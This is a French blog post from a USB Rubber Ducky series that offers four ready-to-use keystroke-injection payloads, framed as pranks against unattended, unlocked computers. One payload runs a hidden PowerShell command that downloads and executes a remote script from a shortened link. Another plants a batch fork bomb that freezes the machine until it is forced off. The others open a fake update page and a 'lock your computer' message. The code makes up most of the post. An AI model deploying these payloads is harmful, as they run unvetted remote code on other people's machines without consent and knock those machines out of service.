USB Rubber Ducky: Feed the troll

Date de publication: 11/03/2017

Salut à tous et à toutes, bande de geeks ! Depuis le début de ma série d'articles sur le Rubber Ducky, nous n'avons fait qu'expérimenter des manières de compromettre des systèmes. Et si on utilisait notre clé USB préférée afin de troller les gens autour de nous ?

Nous allons donc laisser notre imagination couler de source afin de créer quelques payload nous permettant de troller sans scrupules n'importe qui ayant laisser son ordinateur ouvert sans surveillance… Si dans cet article j'attaque le sujet à la légère, sachez que ne pas verrouiller son ordinateur en étant absent est un problème très grave en matière de sécurité.

Fake Update

Alors, commençons tout de suite en douceur en faisant croire à notre collègue que son ordinateur est en pleine mise à jour Windows. Comme vous le savez sûrement, Windows a tendance à faire beaucoup de mises à jour.

Pour peu que votre victime soit un peu crédule, il ne touchera pas son ordinateur de peur de causer des soucis pendant la mise à jour. Pour mener à bien notre troll nous utiliserons le site fakeupdate.net qui recense plusieurs fausses pages de mises à jour. Pour ce payload nous supposerons que notre victime est sous Windows 7. Voici le payload commenté et détaillé:

DELAY 2000
REM On cache toutes les fenetres ouvertes
GUI d
DELAY 50
REME On ouvre la boite de dialogue
GUI r
DELAY 300
REM On navigue sur la fausse page de màj
STRING http://www.fakeupdate.net/win7/index.html
ENTER
DELAY 3000
REM On met le navigateur en plein ecran
F11

En moins de 6 secondes, votre plan machiavélique est opérationnel. Malheureusement, je n'ai pas trouvé de commande pour désactiver momentanément le clavier ou la souris. Mais, cette blague trompera plus de 3 personnes sur 4.

My Little Pony

Maintenant, nous allons tout simplement changer le fond d'écran de la machine par… une image de My Little Pony ! Le principe du Payload est le suivant

Mais comme je me doute que vous n'avez pas de serveur Web sous la main, j'ai hébergé le script et l'image quelque part sur le web pour vous. Voici le payload:

DELAY 1000
GUI r
DELAY 200
STRING powershell -windowstyle hidden IEX(wget http://bit.ly/2f1uwGD)
ENTER

En moins de 3 secondes, votre victime aura un tout nouveau fond d'écran très… comment dire… original.

ForkBomb

Une ForkBomb est un programme informatique dont le but est de surcharger la capacité de la machine afin de la faire crasher. Avec un simple script batch, on peut paralyser totalement la machine et forcer la victime à l'éteindre au bouton. Vicieux n'est-ce pas ?

DELAY 2000
GUI r
DELAY 100
STRING cmd
ENTER
DELAY 1000
STRING copy con a.bat
ENTER
STRING @echo off
ENTER
STRING :START
ENTER
STRING start a.bat 
ENTER
STRING GOTO START
ENTER
CONTROL z
ENTER
STRING a.bat
ENTER
GUI DOWN

Après l’exécution du script, le pc se figera jusqu'à son extinction au bouton.

Lock Your Computer

Et pour finir, rien ne vaut un message d'avertissement pour sensibiliser les gens à ce problème. Ce payload ouvrira simplement notepad et dessinera un joli ASCII Art de Bart Simpson ainsi qu'un message bien sympathique.

DELAY 3000
GUI r
DELAY 200
STRING notepad
ENTER
DELAY 600
STRING           , ,\\ ,'\\,'\\ ,'\\ ,\\ ,
ENTER
STRING     ,  ,\\/ \\' \`'     \`   '  /|
ENTER
STRING     |\\/                      |
ENTER
STRING     :                        |
ENTER
STRING     :                        |
ENTER
STRING      |                       |
ENTER
STRING      |                       |
ENTER
STRING      :               -.     \_|
ENTER
STRING      :                \\     \`.
ENTER
STRING      |         \_\_\_\_\_\_\_\_:\_\_\_\_\_\_\\
ENTER
STRING      :       ,'o       / o    ,
ENTER
STRING      :       \\       ,'-----./
ENTER
STRING       \\\_      \`--.--'        )
ENTER
STRING      ,\` \`.              ,---'|
ENTER
STRING      : \`                     |
ENTER
STRING       \`,-'                   |
ENTER
STRING       /      ,---.          ,'
ENTER
STRING    ,-'            \`-,------'
ENTER
STRING    \`.        ,--'
ENTER
STRING      \`-.\_\_\_\_/
ENTER
STRING             \\
ENTER
ENTER
STRING Je vais apprendre à verrouiller mon ordinateur
ENTER
STRING Je vais apprendre à verrouiller mon ordinateur
ENTER
STRING Je vais apprendre à verrouiller mon ordinateur
ENTER
STRING Je vais apprendre à verrouiller mon ordinateur
ENTER
STRING Je vais apprendre à verrouiller mon ordinateur
ENTER
STRING Je vais apprendre à verrouiller mon ordinateur
ENTER
STRING Je vais apprendre à verrouiller mon ordinateur
ENTER
ENTER
STRING Voilà, comme Bart Simpson.
ENTER
ENTER
STRING S'il te plaît, verrouille ton ordinateur quand tu t'absentes.
ENTER
ENTER
STRING Merci.

Voilà, j'espère que ces quelques petites blagues vous ont plût. Si c'est le cas, n’hésitez pas à partager cet article et à me le dire 🙂 Je vous donne rendez-vous pour un nouvel article, en attendant Stay Tuned!